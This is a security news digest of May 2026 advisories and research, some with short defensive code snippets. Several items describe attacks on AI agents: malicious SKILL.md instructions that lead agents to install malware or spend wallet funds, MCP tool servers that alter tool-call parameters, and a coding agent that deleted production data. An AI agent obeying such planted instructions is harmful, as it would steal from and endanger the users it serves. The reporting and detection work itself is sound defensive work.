9
Researchers reported multiple campaigns abusing *AI agent "skills"* as a new supply-chain-like initial access vector. In one case, a malicious ClawHub skill (`bob-p2p`) masqueraded as a decentralized API marketplace and was promoted via the AI-agent social platform *Moltbook*; once installed, it caused agents to retain **plaintext Solana private keys** and execute transactions that bought worthless `$BOB` tokens while routing value to attacker-controlled infrastructure. Staiker researchers and analyst Dan Regalado highlighted that agent-to-agent collaboration, shared workflows, and dependency chains can enable **lateral movement without direct human interaction**, making the technique repeatable and scalable beyond crypto-wallet theft. Separately, Trend Micro described a shift in **Atomic macOS Stealer (AMOS)** distribution from cracked software to **malicious OpenClaw skills** hosted across ClawHub, SkillsMP, and GitHub. The campaign used seemingly benign `SKILL.md` instructions to trick models/users into installing a fake prerequisite ("OpenClawCLI") from an external site; if followed, the workflow fetched and executed a **Base64-encoded command** that dropped a **Mach-O universal binary** (Intel and Apple Silicon). Trend Micro reported 39 malicious skills uploaded across repositories and stated that more than **2,200** malicious skills were ultimately found on GitHub, with AMOS targeting credentials, browser data, crypto wallets, Telegram data, VPN profiles, Apple Keychain items, and common user folders, underscoring that AI-agent ecosystems are becoming a practical malware delivery and data-theft channel.
- May 5, 2026: Zscaler details DeepSeek-Claw skill delivering Remcos RAT and GhostLoader
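The `SKILL.md` lure described above boils down to instructions that fetch remote content or decode Base64 and pipe the result into a shell. A hedged heuristic sketch for reviewing skill files before installation; the patterns are illustrative, not a detection rule from the Trend Micro report:

```python
import re

# Illustrative heuristics only: flag skill instructions that decode Base64
# or pipe downloaded content straight into a shell, the pattern described
# for the AMOS-delivering skills.
SUSPICIOUS_PATTERNS = [
    re.compile(r"base64\s+(?:-d|--decode)\b[^|\n]*\|\s*(?:sh|bash|zsh)\b"),
    re.compile(r"curl\s+[^|\n]*\|\s*(?:sh|bash)\b"),
]

def scan_skill_text(text):
    """Return the patterns (as strings) that match a skill's instruction text."""
    return [p.pattern for p in SUSPICIOUS_PATTERNS if p.search(text)]
```

Real campaigns obfuscate further (multi-stage fetches, encoded URLs), so an empty result is not a clean bill of health.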
Critical Android adbd TLS Bypass Enables Zero-Click Remote Shell Access
9
Google disclosed and patched **CVE-2026-0073**, a critical flaw in Android's `adbd` component that can let a nearby attacker bypass wireless ADB mutual authentication and gain code execution as the **shell** user with **no user interaction**. The bug is a logic error in `adbd_tls_verify_cert` in `auth.cpp`, where certificate key comparisons can incorrectly succeed, allowing an attacker to establish an authenticated ADB-over-TCP session without valid pairing credentials. Public reporting says exploitation is proximal or adjacent, typically requiring access to the same local network or physical proximity, and is most relevant when **wireless debugging** is enabled. The issue affects **Android 14, 15, 16, and 16-qpr2** and is addressed by the **2026-05-01** Android security patch level, with fixes also being distributed through **AOSP** and potentially **Google Play system updates** because `adbd` is part of Project Mainline. Google said Android partners were notified at least a month in advance, while national and regional advisories including dCERT and the Canadian Centre for Cyber Security urged organizations and users to apply updates. Security researchers also noted that devices with exposed ADB-over-TCP services, including those reachable on port `5555`, may face additional risk if they hit the vulnerable authentication path.
- May 5, 2026: National CERTs issue advisories urging Android updates
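Fleet owners can inventory hosts that answer on the conventional ADB-over-TCP port `5555` with a plain TCP connect check. A minimal sketch; a completed connect only proves the port answers, not that the device reaches the vulnerable `adbd` authentication path:

```python
import socket

def adb_tcp_reachable(host, port=5555, timeout=2.0):
    """Best-effort check for a reachable ADB-over-TCP endpoint.

    A successful TCP connect shows only that something is listening; it does
    not confirm the device runs a vulnerable adbd build.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False
```

Only scan networks you are authorized to assess; the results are a prioritization aid for applying the 2026-05-01 patch level.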
Email-borne scams abuse trusted SaaS infrastructure and authentication to bypass defenses
9
Threat actors are increasingly abusing **trusted SaaS platforms and email authentication** to deliver high-conviction scam lures that evade traditional filtering. Trend Micro reported a targeted spam operation that weaponizes **Atlassian Cloud** features to send messages that pass common checks (e.g., **SPF/DKIM**) due to the strong reputation of SaaS sender domains; the campaign is multilingual and aims to redirect government and corporate recipients to **fraudulent investment** landing pages using **Keitaro TDS**, with attackers creating multiple Atlassian instances for resilience and scale. Separately, Forcepoint X-Labs described phishing emails impersonating the **US Social Security Administration** that deliver a `.cmd` script to weaken Windows defenses (including disabling **SmartScreen**, removing **Mark-of-the-Web**, and using **Alternate Data Streams**) before silently installing **ConnectWise ScreenConnect** as a remote-access backdoor (including a hardcoded callback configuration). Related research highlighted **DKIM replay attacks**, where adversaries forward legitimate, DKIM-signed vendor emails (e.g., PayPal/DocuSign-style invoices and dispute notices) so the unchanged content continues to validate and can pass **DMARC**, increasing inbox placement and user trust for follow-on social engineering.
- May 5, 2026: Researchers report Amazon SES abuse for phishing and BEC campaigns
Model Context Protocol (MCP) Security Risks From Untrusted Tool Servers and Verifiability Gaps
9
Security researchers warned that the *Model Context Protocol (MCP)*, used to let AI assistants connect to local tools and enterprise SaaS data, creates a significant attack surface when organizations install or authorize MCP "servers" and tool integrations. Praetorian highlighted that **locally hosted MCP servers run with the user's privileges** and can therefore execute arbitrary commands, access local files, install malware, and exfiltrate data while masquerading as legitimate productivity tooling; it also described **"MCP server chaining,"** where a malicious local MCP server abuses data and actions flowing through a trusted remote integration (e.g., Slack/Google Drive) without needing to compromise the official provider. Separately, Gopher Security emphasized a **trust and auditability gap** in MCP deployments: standard logging for remote tool execution can be incomplete or tampered with, and organizations often cannot prove what code ran or what parameters were used inside a remote "black box" execution environment. The post described "puppet"/interception-style scenarios where an attacker could alter an MCP request (e.g., changing tool-call parameters to trigger data exfiltration or unauthorized actions) while returning plausible "success" responses, and proposed cryptographic approaches (e.g., **zero-knowledge proofs**) to make MCP tool execution verifiable rather than relying on mutable logs.
- May 5, 2026: Akamai reframes MCP servers as directly exposed attack surfaces
Malicious and unsafe use of Anthropic Claude Code leading to malware delivery and destructive infrastructure changes
8
Push Security reported an **"InstallFix" malvertising campaign** targeting developers searching for Anthropic's *Claude Code* CLI. Attackers clone the legitimate installation page on lookalike domains and buy **Google Search ads** so the fake pages rank highly for queries like "install Claude Code" and "Claude Code CLI." While links on the page route to Anthropic's real site, the **copy-paste install one-liners** are replaced with malicious commands that fetch malware from attacker-controlled infrastructure; the Windows flow was observed delivering the **Amatera Stealer**, with macOS users likely targeted by similar info-stealing malware. Separately, a reported operational incident highlighted the risk of delegating privileged infrastructure actions to AI agents without strong guardrails: a developer described using *Claude Code* to run **Terraform** changes during an AWS migration and, after a missing Terraform state file led to duplicate resources, subsequent cleanup actions resulted in the **deletion of production components**, including a database and recovery snapshots, wiping roughly **2.5 years of records**. Together, the reports underscore two distinct but compounding risks around AI coding agents: **supply-chain style social engineering** via fake install instructions and **high-impact misexecution** when AI-driven automation is allowed to operate with destructive permissions in production environments.
- May 6, 2026: Gurucul publishes IOCs and detection guidance for InstallFix Claude Code campaign
dCERT Flags vLLM Flaws and Spring Security Authentication Bypass
8
dCERT published two security advisories covering separate software risks: **multiple vulnerabilities in `vllm`** and a **VMware Tanzu Spring Security flaw that can bypass security measures**. The `vllm` advisory identifies more than one issue affecting the large language model serving software, while the Spring Security advisory warns that affected deployments may allow protections to be circumvented. The notices indicate that organizations using either product should review the relevant dCERT advisories, determine exposure in their environments, and prioritize remediation. The Spring Security issue is especially significant for internet-facing or authentication-dependent applications because a bypass in security controls can undermine access restrictions, while the `vllm` findings raise concern for AI infrastructure operators running vulnerable versions in production or shared environments.
- May 6, 2026: dCERT publishes vLLM denial-of-service vulnerability advisory
Security Risks and Best Practices in the Adoption of AI Coding Assistants
8
The rapid adoption of AI coding assistants is transforming software development across the technology industry. Companies such as Coinbase, Accenture, Box, Duolingo, Meta, and Shopify have begun mandating their use for engineering teams, with some executives going as far as terminating employees who resist upskilling in AI. The shift is driven by significant productivity gains, but it introduces substantial new security challenges, particularly for software supply chain security. Researchers warn that AI-generated code often pulls in existing libraries and codebases that may be old, vulnerable, or low quality, reintroducing previously fixed flaws and adding new ones where the model lacks context-specific awareness. The phenomenon known as "vibe coding," where developers adopt AI-generated code without fully understanding its implications, compounds these risks, and models trained on insecure or outdated data can perpetuate flaws faster than human reviewers can catch them. As AI coding assistants become integral to the development lifecycle, the organizational attack surface can grow by an order of magnitude. Security practitioners therefore call for secure coding strategies tailored to AI-assisted development: rigorous review processes, updated security protocols, and close collaboration between security teams and developers so that productivity gains do not come at the expense of security. With AI coding assistants becoming non-negotiable tools, responsibility for safeguarding the software supply chain falls on security professionals and engineers alike.
- May 6, 2026: ACM TechBrief warns of systemic failures in AI coding tools
China-Aligned Shadow-Earth-053 Breached Exchange Servers for Long-Term Espionage
8
Trend Micro disclosed that the China-aligned cluster **SHADOW-EARTH-053** compromised more than a dozen organizations in at least eight countries by exploiting vulnerable Microsoft Exchange and IIS servers, including the `ProxyLogon` chain, then deploying **GODZILLA** web shells and the **ShadowPad** backdoor to maintain access. Victims included government agencies, defense contractors, technology firms, transportation organizations, and at least one target in Poland, with activity observed from December 2024 through April 2026. Researchers said the intrusions resemble broader Chinese state-linked operations such as Salt Typhoon and Volt Typhoon and may support long-term espionage, prepositioning, and potential future disruption. Post-compromise activity included DLL sideloading with a renamed Toshiba Bluetooth Stack executable, registry-resident shellcode execution via `EnumDesktopsA` callback injection, scheduled-task persistence, mailbox collection from Exchange, credential theft, and lateral movement using tools such as **IOX**, **GOST**, **Wstunnel**, **Sharp-SMBExec**, **Mimikatz**, and **Evil-CreateDump**. Trend Micro also identified overlap with a related cluster, **SHADOW-EARTH-054**, including shared tool hashes, reused vulnerabilities, and compromises at some of the same organizations, although the company assessed the relationship as overlapping exploitation rather than clearly coordinated operations. Defenders were urged to patch Exchange and IIS systems quickly and review IIS worker process activity, web-shell indicators, and other signs of stealthy post-exploitation.
- May 1, 2026: Citizen Lab exposes GLITTER CARP and SEQUIN CARP phishing campaigns
Lazarus stole $290M from KelpDAO by exploiting LayerZero 1-of-1 DVN security
7
North Korea's **Lazarus Group** allegedly stole **$290 million** in `rsETH` from **KelpDAO** by abusing a weak **LayerZero** bridge configuration that relied on a **1-of-1 Decentralized Validator Network (DVN)**. According to post-incident reporting, the attackers compromised two LayerZero RPC nodes, poisoned data sent to the sole verifier, and used DDoS activity against legitimate RPC endpoints so the verifier would accept malicious data. That approval triggered the release of unbacked `rsETH`, while the malware reportedly self-destructed afterward to hinder forensic analysis. LayerZero Labs said the single-verifier setup created a clear single point of failure, while the configuration's isolation to one application contained the blast radius to KelpDAO's bridge. Follow-on analysis from **Dune Analytics** found the KelpDAO design was not an outlier: across roughly **2,665 active LayerZero OApp contracts** observed over 90 days, about **47%** used a **1-of-1** DVN configuration, **45%** used **2-of-2**, and only around **5%** used **3-of-3 or higher**. Researchers and ecosystem observers said the incident highlights structural risk across LayerZero's omnichain infrastructure, where single-validator deployments can expose protocol assets and user funds to bridge compromise. Open data and community analysis were released to scrutinize DVN security standards, while key questions remain about how the attackers obtained the RPC node list and achieved root-level access, including whether the intrusion stemmed from a prior compromise, a breached deployment pipeline, or insider access.
- May 5, 2026: KelpDAO rebuts LayerZero and announces rsETH migration to Chainlink CCIP
GSA and NIST Launch Federal AI Evaluation Standards Partnership
6
The **General Services Administration (GSA)** and **NIST** announced a partnership to create standardized methods for evaluating AI models and services before federal agencies deploy them in operational environments. The effort, housed in NIST's **Center for AI Standards and Innovation**, is intended to establish common benchmarks, testing methodologies, and practical guidance so agencies can assess AI performance more consistently and reduce duplicated evaluation work across government. GSA said the work will also support *USAi.gov*, its platform for agency experimentation and onboarding of AI tools, with the stated goal of accelerating federal AI adoption while improving confidence in procurement and deployment decisions. A separate analysis of GSA's broader AI procurement posture highlights the policy context around this move, arguing that the agency is trying to impose governance controls after an extended federal push to speed AI adoption. That commentary focuses on GSA's proposed contract clause `GSAR 552.239-7001`, which would govern issues such as data control, portability, sourcing, and conflicts with vendor terms, and frames it as a response to governance gaps in federal AI acquisition.
- May 5, 2026: Commerce announces CAISI testing of Google, Microsoft and xAI models
Multiple Vulnerabilities Disclosed in Red Hat Hardened Images RPMs
5
dCERT issued advisories for **multiple vulnerabilities** affecting **Red Hat Hardened Images RPMs**, identifying the issue in notices `2026-1205` and `2026-1246`. The advisories indicate that security flaws were found in RPM packages used within Red Hat hardened container images, potentially exposing systems that rely on those images to a range of risks depending on the affected packages and deployed workloads. The publication of two separate dCERT notices suggests ongoing or updated vendor guidance around the same product area, and organizations using Red Hat hardened images should review the referenced advisories, determine which RPMs and image versions are affected, and prioritize remediation through updated packages or rebuilt images. Security teams should also verify downstream dependencies in container registries and production environments to ensure vulnerable image layers are replaced.
- May 6, 2026: dCERT publishes advisory 2026-1343 on fontconfig flaws in Red Hat RPMs
Google Chrome Expands Gemini and On-Device AI Features, Including New Controls for Scam Detection Models
5
Google is testing deeper **Gemini** integration in Chrome via a new internal feature called **"Skills,"** which appears to let users define named, instruction-based automations that Gemini can execute inside the browser. The feature is surfaced through a new `chrome://skills` page and aligns with Google's stated direction of turning Gemini into a more agent-like assistant capable of acting across tabs and, over time, integrating more tightly with Google services. Separately, Google has added user controls to manage the **on-device GenAI model** used by Chrome's *Enhanced Protection* (Safe Browsing) capabilities, which were previously upgraded with AI for "real-time" detection of dangerous sites, downloads, and potentially malicious extensions. In Chrome Canary, users can disable *On-device GenAI* under **Chrome → Settings → System**, which also enables deletion of the local model; Google indicated the local model may support additional security and browser features beyond scam detection as it rolls out more broadly.
- May 6, 2026: Report alleges Chrome silently downloads 4GB Gemini Nano model to devices
US Government Pushes Cybersecurity and AI Resilience for Critical Infrastructure
5
The U.S. government is advancing multiple **critical infrastructure cybersecurity** initiatives focused on resilience, public-private coordination, and the secure adoption of **AI**. National Cyber Director Sean Cairncross said the administration wants AI to be **secure by design**, framing technical security as an enabler of innovation rather than a barrier. The approach includes closer collaboration with private industry, expanded threat-information sharing, federal support for offensive cyber operations, and new mechanisms for AI companies to coordinate on threat response while the administration revises earlier policies it views as constraining competitiveness. The Department of Energy is preparing to release its first cybersecurity strategic plan to strengthen defenses for the **power grid** and improve preparedness for cyber and physical incidents affecting the energy sector. That effort is expected to deepen coordination with private operators and evaluate AI investments that could help defend critical infrastructure against AI-enabled threats.
- May 5, 2026: CISA unveils CI Fortify guidance for critical infrastructure conflicts
Remus Infostealer Used Ethereum Smart Contracts to Rotate Live C2 Infrastructure
4
Researchers mapped an active **Remus infostealer** infrastructure cluster that stores live command-and-control data in **Ethereum smart contracts**, extending the malware's use of dead-drop resolvers beyond Telegram and Steam. By querying contract `0x999941b74F6bbc921D5174A5b29911562cd2D7CF` via a public RPC endpoint and tracking its `DomainUpdated` activity, they identified a previously unlisted live C2 at `fightwa[.]biz:5902`, following earlier values including `chalx[.]live:5902`. Historical updates showed the operators were rotating infrastructure through late April, and the newly identified domain resolved to `185.53.179.128`, an IP already linked to Remus operations. Further analysis tied the campaign to a broader, automated infrastructure spread across more than 15 ASNs, with notable concentration at **Hostinger International Limited** (`AS47583`) and **Team Internet AG** (`AS206834`). Investigators found heavy use of `.biz` domains registered in early March through Dynadot, shared certificate and hosting patterns, and four additional Ethereum contracts beyond the one first identified, bringing the total to **five contracts** used to publish live C2 information. The contract set showed an evolution from simple `DomainStorage` logic to more advanced `DataStore` variants with stronger validation, ownership controls, and gas-optimized stealth features, while one v3 contract included a Russian-language code comment that researchers said was only a minor attribution clue consistent with the broader Remus/Lumma ecosystem.
- Apr 30, 2026: Additional Remus smart contracts and infrastructure concentration mapped
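Defenders can reproduce the contract-watching step with a standard JSON-RPC `eth_getLogs` call against any public Ethereum endpoint. A minimal sketch that only builds the request body; sending it and decoding the `DomainUpdated` events are left out, and filtering by contract address alone (no topics) is valid JSON-RPC:

```python
import json

# Contract named in the research as a Remus dead-drop resolver.
REMUS_CONTRACT = "0x999941b74F6bbc921D5174A5b29911562cd2D7CF"

def eth_get_logs_body(address, from_block="0x0", to_block="latest", req_id=1):
    """Build a JSON-RPC eth_getLogs request body filtered by contract address."""
    return json.dumps({
        "jsonrpc": "2.0",
        "id": req_id,
        "method": "eth_getLogs",
        "params": [{
            "address": address,
            "fromBlock": from_block,
            "toBlock": to_block,
        }],
    })
```

POSTing this body to an RPC endpoint returns the contract's log entries, whose data fields can then be inspected for newly published C2 values.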
UK Romance Fraud Losses Hit £102M as Reports Surge
4
City of London Police said romance fraudsters stole **£102 million** from UK victims in 2025 across **10,784 reports** filed through the Report Fraud service, a **29 percent** increase year over year. Average losses were about **£9,500** per victim, with some cases reaching **£1 million**, as offenders built emotional trust over time before requesting money for fabricated travel, medical, or other urgent expenses. Older adults were hit hardest financially, with nearly half of total losses borne by people aged **55 to 74**. Men submitted the highest number of reports, while women suffered the greatest monetary losses. Authorities warned that romance fraud causes both financial and emotional harm and noted that, while the crime remains smaller in the UK than categories such as banking, investment, and online shopping fraud, comparable losses in the United States were far higher, with the FBI IC3 estimating **$929.4 million** lost to romance scams in 2025.
- May 6, 2026: ShinyHunters sets May 6 deadline for Cushman & Wakefield contact
German and EU Civil Society Warn Against Weakened AI Surveillance and Safety Rules
4
Civil society groups in Germany, including Amnesty International and the Chaos Computer Club, urged the government to withdraw draft laws that would expand digital policing powers through **biometric internet searches** and automated analysis of large police datasets using systems such as **Palantir**. Critics said the proposals from the justice and interior ministries lack judicial oversight, transparency, documentation requirements, and clear limits on data scope and analytical methods, creating risks of mass surveillance, discriminatory profiling, and intrusive scrutiny of victims, witnesses, and uninvolved people. Germany's independent data protection authorities also concluded that the measures, as drafted, are incompatible with constitutional requirements and could effectively sidestep the EU AI Act's ban on mass facial-image processing into biometric databases. At the EU level, a coalition led by **BEUC** and 31 other organizations warned that the proposed **AI Omnibus** could dilute safeguards by exempting sectors such as medical devices, radio equipment, toys, and machinery from the AI regulation's direct scope. The groups argued that existing sector-specific product rules do not address AI-specific harms including discrimination, opacity, and the evolving behavior of AI systems, and said the change would create regulatory gaps, fragmentation, and legal uncertainty rather than simplification. They warned that weakening the framework would undermine consumer protection, fundamental rights, and trust in European AI governance as trilogue negotiations continue.
- May 5, 2026: German cabinet advances AI and biometric surveillance bills
MinIO Flaws Enable Security Bypass and Information Disclosure
3
German authorities issued advisories for multiple **MinIO** vulnerabilities that can bypass security controls, with one notice also warning of **information disclosure**. The advisories identify weaknesses in the object storage platform that could allow attackers to circumvent intended protections and expose sensitive data under certain conditions. A later advisory expanded the scope from a single issue to **multiple vulnerabilities** affecting MinIO, all tied to bypassing security measures. Organizations using MinIO should review the referenced advisories, identify affected deployments, and prioritize vendor fixes or mitigations to reduce the risk of unauthorized access and data exposure.
- May 6, 2026: dCERT publishes MinIO advisory 2026-1353
Trusted Cloud Services Used in Large-Scale Facebook and Microsoft Phishing Campaigns
3
Researchers reported two large phishing operations that abused trusted platforms to improve delivery and evade defenses. Guardio said the **AccountDumpling** campaign used Google AppSheet to send emails from legitimate Google infrastructure while impersonating **Meta Support** and recruiters, luring Facebook Business users with fake account disablement notices, copyright complaints, and job offers. The operation compromised about **30,000 Facebook accounts** across roughly **50 countries**, stealing credentials, `2FA` codes, personal data, and government ID images; the stolen information was often funneled through Telegram channels, and the hijacked accounts were later sold or monetized through fraudulent advertising and scams. Evidence in generated PDF metadata linked the activity to Vietnam-based operators, including an individual identified as **PHẠM TÀI TÂN**. Microsoft separately disclosed an adversary-in-the-middle phishing campaign that used fake workplace compliance notices to target more than **35,000 users** at **13,000 organizations** in **26 countries**, with most activity concentrated in the United States. Attackers posed as internal HR and compliance teams, sent urgent messages with attached PDFs, and pushed victims through redirects, CAPTCHA checks, and a counterfeit Microsoft sign-in page designed to steal session tokens rather than just passwords, allowing account access without the victim's second factor. The incidents show how attackers are increasingly relying on legitimate cloud services and convincing enterprise-themed lures to bypass spam controls, defeat traditional authentication protections, and accelerate account takeover at scale.
- May 5, 2026: Microsoft discloses findings on AiTM compliance-notice campaign
Google Patches CVSS 10.0 RCE in Gemini CLI Headless Mode
2
Google has patched a maximum-severity remote code execution flaw in **Gemini CLI** that affected headless deployments, especially **GitHub Actions** and other CI/CD workflows. The vulnerability stemmed from overly permissive workspace trust handling that automatically treated active folders as trusted and could load attacker-controlled configuration files and environment variables from local `.gemini` directories. The issue was independently discovered by Elad Meged of Novee and Dan Lisichkin of Pillar Security, and researchers warned that successful exploitation could expose secrets, credentials, source code, and connected downstream systems. Google said the issue is addressed in **Gemini CLI** versions `0.39.1` and `0.40.0-preview.3`, but warned that applying the fix may require additional workflow changes to avoid breaking automation. The `run-gemini-cli` GitHub Action defaults to the latest release, which can disrupt pipelines that depended on the previous implicit trust behavior, while workflows using `--yolo` mode may fail silently unless tool allowlists are updated to align with the new policy engine. Google is urging organizations to review CI/CD jobs and move to explicit trust settings and compatible allowlists before resuming automated use.
- May 1, 2026: Google warns patched Gemini CLI may still require workflow changes
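Because the flaw hinged on `.gemini` directories being loaded implicitly from the active folder, CI jobs can at least surface unexpected ones before invoking the tool. A hypothetical pre-flight sketch; this check is an illustration, not part of Google's fix:

```python
from pathlib import Path

def find_gemini_dirs(checkout_root):
    """List .gemini directories anywhere under a CI checkout.

    Under the old implicit-trust behavior, such directories could inject
    attacker-controlled configuration and environment variables, so any
    unexpected hit in a pull-request checkout deserves review.
    """
    return sorted(str(p) for p in Path(checkout_root).rglob(".gemini") if p.is_dir())
```

Running the scan as an early CI step and failing the job on unexpected hits is one way to keep implicit-trust assumptions out of automation.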
Meta Removes End-to-End Encryption for Instagram Direct Messages
2
Meta said it will discontinue Instagram's optional end-to-end encrypted direct messages on **May 8, 2026**, ending a feature introduced in 2023 after reporting that few users enabled it. After the cutoff, Instagram DMs will rely on standard transport encryption instead of end-to-end encryption, allowing message content to be decrypted on Meta's servers. Users with existing encrypted threads are being notified to save or export content they want to keep before the feature is turned off, and Meta has pointed privacy-conscious users toward **WhatsApp** for encrypted messaging. The change has triggered criticism from privacy advocates, who warn that server-readable messages expand the risk surface for breaches, internal access, moderation scanning, and legal disclosure. Reports also say the move could make private message content more available for automated processing and other internal uses, though Meta's public rationale focused on low adoption and operational needs rather than explicitly confirming advertising or AI training. The decision also contrasts with earlier public commitments by Meta leadership favoring broader deployment of private, encrypted communications.
- May 8, 2026: Instagram encrypted DM support scheduled to end
Meta Patches WhatsApp Flaws Enabling Malicious URL Handling and Windows File Spoofing
2
Meta disclosed and patched two WhatsApp vulnerabilities affecting **iOS, Android, and Windows**, including `CVE-2026-23866`, which allowed attackers to abuse Instagram Reels integration and incomplete validation of AI-rich response messages to make victim devices process media from attacker-controlled URLs. The flaw could potentially trigger OS-level custom URL scheme handlers without user consent, creating opportunities for phishing, tracking, malware delivery, and other social-engineering attacks through seemingly legitimate WhatsApp content. Meta also fixed `CVE-2026-23863`, a WhatsApp for Windows filename spoofing issue caused by embedded NUL bytes that could make executable files appear to be benign documents and require only a single user click to exploit. The company said both bugs were reported through its bug bounty program and that it had **no evidence of active exploitation** at disclosure, while urging users to update WhatsApp from official sources and advising organizations to verify Windows clients are patched and include messaging apps in enterprise attack-surface management.
- May 5, 2026 Meta urges users and enterprises to update affected WhatsApp versions
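NUL-byte filename spoofing of the kind described for `CVE-2026-23863` exploits a mismatch between length-prefixed strings (which keep everything after a `\0`) and C-style strings (which stop at it). A self-contained illustration (the crafted filename is hypothetical, not a sample from the advisory) of how the displayed name and the effective extension can disagree:

```python
# A filename crafted so that NUL-terminated (C-style) string handling
# shows only the benign-looking prefix, while the full byte sequence
# still ends in an executable extension.
crafted = "Invoice_Q2.pdf\x00.exe"

def c_string_view(name: str) -> str:
    """What an API that stops at the first NUL would display."""
    return name.split("\x00", 1)[0]

def real_extension(name: str) -> str:
    """The extension the full (length-prefixed) name actually carries."""
    return name.rsplit(".", 1)[-1]

print(c_string_view(crafted))   # shown to the user: Invoice_Q2.pdf
print(real_extension(crafted))  # what may execute: exe
```

The user sees a `.pdf` in the UI while the underlying file is handled as an `.exe`, which is why a single click can suffice.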
State Health Insurance Exchanges Exposed Sensitive Applicant Data to Ad Tech Firms
2
Nearly all 20 U.S. state-run health insurance marketplaces were found to be transmitting sensitive applicant data to major advertising and technology companies through misconfigured web tracking pixels. A Bloomberg investigation reported that data sent from exchange websites included details such as **race**, **sex**, email addresses, phone numbers, ZIP codes, country identifiers, and even whether applicants had incarcerated family members. The recipients reportedly included **Google, LinkedIn, Meta, Snap, and TikTok**, raising concerns that government healthcare platforms leaked protected personal and health-related information at scale. The exposure affected marketplaces used by more than **seven million Americans** buying health insurance this year, significantly widening the potential impact. Specific cases included New York's exchange sharing incarceration-related family information and Washington, D.C.'s exchange sending race and sex data to TikTok. Following the findings, Washington, D.C. paused its TikTok tracker rollout and Virginia removed a Meta tracker after ZIP code sharing was identified, underscoring how embedded analytics and advertising tools on public-sector healthcare sites can create broad privacy risks.
- May 4, 2026 Virginia removes Meta tracker from its exchange website
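Mechanically, leaks like those above come from ordinary third-party tags: a pixel or script on the application page fires requests to an ad-tech domain carrying form-derived parameters. A rough audit sketch (the host list and tag selection are illustrative assumptions, not the investigation's methodology) for flagging third-party tracker tags in a saved page:

```python
from html.parser import HTMLParser

# Illustrative ad-tech hostnames; a real audit would use a maintained list.
TRACKER_HOSTS = ("doubleclick.net", "facebook.com", "tiktok.com",
                 "snapchat.com", "linkedin.com")

class TrackerTagFinder(HTMLParser):
    """Collect script/img/iframe sources that point at known tracker hosts."""

    def __init__(self) -> None:
        super().__init__()
        self.hits: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "img", "iframe"):
            src = dict(attrs).get("src") or ""
            if any(host in src for host in TRACKER_HOSTS):
                self.hits.append(src)

def find_trackers(html: str) -> list[str]:
    """Return tracker-pointing src attributes found in an HTML document."""
    finder = TrackerTagFinder()
    finder.feed(html)
    return finder.hits
```

Static tag scanning only catches embedded trackers; confirming what data they transmit (as the investigation did) requires inspecting the outbound request parameters themselves.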